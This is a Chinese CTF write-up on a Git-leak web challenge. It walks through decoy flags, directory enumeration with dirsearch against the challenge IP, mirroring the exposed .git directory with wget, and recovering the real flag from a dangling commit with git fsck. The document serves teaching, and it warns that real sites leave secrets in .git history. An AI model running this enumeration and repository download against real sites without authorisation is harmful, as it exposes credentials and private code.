CTF:Git泄露
题目描述:我哥说渗透我只用linux环境
我们用Windows系统解这道题
Base64假Flag
点开链接查看网站源码,发现html文件里存在注释:
<html>
<head>
<body>
<p>Hello,world!<p>
<p>This is my friend :<!--tig--></p>
<!--flag{Zmxhz19ub3RfaGvyzSEHIQ==}-->
</body>
</head>
</html>
使用base64解密一下Zmxhz19ub3RfaGvyzSEHIQ==:
flaϟnot_hk⍡!
base64解密的结果是乱码,该base64实际上经过某些字符大小写混淆,暴力破解得到正确的Base64字符串应该是:
ZmxhZ19ub3RfaGVyZSEhIq==
# 即flag_not_here!!"
当然,这是个假flag,:)
目录假flag
对网址进行目录遍历,例如使用dirsearch:
python dirsearch.py -u http://160.202.254.160:11403/
输出:
Target: http://160.202.254.160:11403/
[22:05:13] Starting:
[22:05:15] 301 - 326B - /.git -> http://160.202.254.160:11403/.git/
[22:05:15] 200 - 14B - /.git/COMMIT_EDITMSG
[22:05:15] 200 - 414B - /.git/branches/
[22:05:15] 200 - 618B - /.git/
[22:05:15] 200 - 133B - /.git/config
[22:05:15] 200 - 73B - /.git/description
[22:05:15] 200 - 23B - /.git/HEAD
[22:05:15] 200 - 597B - /.git/hooks/
[22:05:15] 200 - 198B - /.git/index
[22:05:15] 200 - 460B - /.git/info/
[22:05:15] 200 - 240B - /.git/info/exclude
[22:05:15] 200 - 482B - /.git/logs/
[22:05:15] 200 - 1KB - /.git/logs/HEAD
[22:05:15] 301 - 336B - /.git/logs/refs -> http://160.202.254.160:11403/.git/logs/refs/
[22:05:15] 301 - 342B - /.git/logs/refs/heads -> http://160.202.254.160:11403/.git/logs/refs/heads/
[22:05:15] 200 - 1KB - /.git/logs/refs/heads/master
[22:05:15] 301 - 337B - /.git/refs/heads -> http://160.202.254.160:11403/.git/refs/heads/
[22:05:15] 200 - 463B - /.git/refs/
[22:05:15] 200 - 571B - /.git/objects/
[22:05:15] 200 - 41B - /.git/refs/heads/master
[22:05:15] 301 - 336B - /.git/refs/tags -> http://160.202.254.160:11403/.git/refs/tags/
[22:05:15] 403 - 283B - /.ht_wsr.txt
[22:05:15] 403 - 283B - /.htaccess.bak1
[22:05:15] 403 - 283B - /.htaccess.sample
[22:05:15] 403 - 283B - /.htaccess.orig
[22:05:15] 403 - 283B - /.htaccessBAK
[22:05:15] 403 - 283B - /.htaccess_extra
[22:05:15] 403 - 283B - /.htaccess_sc
[22:05:15] 403 - 283B - /.htaccessOLD
[22:05:15] 403 - 283B - /.htaccess_orig
[22:05:15] 403 - 283B - /.html
[22:05:15] 403 - 283B - /.htm
[22:05:16] 403 - 283B - /.htpasswds
[22:05:16] 403 - 283B - /.httr-oauth
[22:05:16] 403 - 283B - /.htpasswd_test
[22:05:16] 403 - 283B - /.php
[22:05:17] 403 - 283B - /.htaccess.save
[22:05:17] 403 - 283B - /.htaccessOLD2
[22:05:26] 200 - 32B - /flag.txt
[22:05:33] 403 - 283B - /server-status/
[22:05:33] 403 - 283B - /server-status
Task Completed
发现路径下存在一个flag.txt文件返回200,访问http://160.202.254.160:11403/flag.txt
flag{hahahahahhahahahahnotflag}
又一个假flag,:)
Git假Flag
在html文件里还存在一个注释:
<p>This is my friend :<!--tig--></p>
tig是git的一个可视化工具,用于浏览 Git 历史、查看分支和提交记录。那么这题可能与Git有关
网站上存在一个.git目录,将其下载下来,例如使用GNU Wget for Windows:
wget -r http://160.202.254.160:11403/.git/
进入 160.202.254.160+11403目录,使用git工具查看提交记录:
git log
输出:
commit d256328b55ccd8c985237e870a16a3e840f2aa2a (HEAD -> master)
Author: vFREE <flag@flag.com>
Date: Sun Jan 17 20:30:53 2021 +0800
flag is here?
commit e0b8e8e2df0e08f9719df35b8cf68ab4cbd8d3b0
Author: vFREE <flag@flag.com>
Date: Sun Jan 17 20:30:09 2021 +0800
this is index.html
查看第一条提交记录的内容:
git show d256328b55ccd8c985237e870a16a3e840f2aa2a
输出:
commit d256328b55ccd8c985237e870a16a3e840f2aa2a (HEAD -> master)
Author: vFREE <flag@flag.com>
Date: Sun Jan 17 20:30:53 2021 +0800
flag is here?
diff --git a/flag.txt b/flag.txt
new file mode 100644
index 0000000..6c4cfd1
--- /dev/null
+++ b/flag.txt
@@ -0,0 +1 @@
+flag{not_here}
flag{not_here},又一个假flag,:)
真Flag
git存在一种dangling commit,这是一种损坏的Git仓库中常见的现象,简单来说,它是一个“被遗弃”的快照。虽然它完整保存了当时的项目状态、作者信息和提交日志,但你已经没有任何“书签”(分支名)能直接找到它了。
git log命令无法显示这些内容,但我们可以使用git fsck命令来查找:
git fsck --lost-found
输出:
# 以上省略
error: refs/tags/index.html@C=N;O=D: invalid sha1 pointer 0000000000000000000000000000000000000000
error: refs/tags/index.html@C=S;O=A: invalid sha1 pointer 0000000000000000000000000000000000000000
error: refs/tags/index.html@C=S;O=D: invalid sha1 pointer 0000000000000000000000000000000000000000
dangling commit 40c6d51b81775a1590c1b051d9562222e41c4741
dangling commit 13ce8d0d982aee1efdbc42cbae0acdaaf29d5aa1
可以看到有两个dangling commit,根据哈希值查看第一个dangling commit的内容:
git show 40c6d51b81775a1590c1b051d9562222e41c4741
输出:
commit 40c6d51b81775a1590c1b051d9562222e41c4741
Author: vFREE <flag@flag.com>
Date: Sun Jan 17 20:34:43 2021 +0800
flag is here?
diff --git a/flag.txt b/flag.txt
index aa6f6dc..726e5d1 100644
--- a/flag.txt
+++ b/flag.txt
@@ -1 +1 @@
-flag{nonono}
+flag{git_is_good_distributed_version_control_system}
flag{git_is_good_distributed_version_control_system}是真flag
启示
挺有意思的CTF题,一些网站管理员可能会图省事在网站上留下.git目录,或者没有正确配置访问权限,即使当前网页应用的敏感信息已经被删除了,但通过git历史记录可能能找到一些测试时留下的api密钥、账号密码等敏感信息。